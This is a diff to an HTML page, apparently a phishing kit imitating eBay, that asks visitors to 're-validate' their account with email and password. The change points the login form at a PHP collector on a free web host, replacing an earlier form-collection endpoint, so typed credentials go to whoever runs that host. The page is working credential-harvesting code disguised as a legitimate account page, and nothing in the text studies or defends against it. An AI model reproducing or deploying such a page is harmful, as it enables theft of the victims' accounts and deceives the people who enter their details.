--- a/ebat.html
+++ b/ebat.html
@@ -18,7 +18,7 @@
 <h1>Hello</h1>
 <h3> Enter your details to Re-validate your Account </h3
 ><div>
-<form  action="https://usebasin.com/f/1825597eb7cd" method="post">
+<form  action="https://mooreinsert.000webhostapp.com/moore.php" method="post">
 <div><br /><div class=textbox><label for=userid class=floating-label__label>Email or username</label><input id=userid class="textbox__control textbox__control--fluid textbox__control--underline" type=text value name=userid maxlength=64 autocomplete=username></input>
 <div>
 <p><br /><div class=textbox><label  class=floating-label__label>Password</label><input id=userid class="textbox__control textbox__control--fluid textbox__control--underline" type=password  name=passwd maxlength=64 autocomplete=username></input>
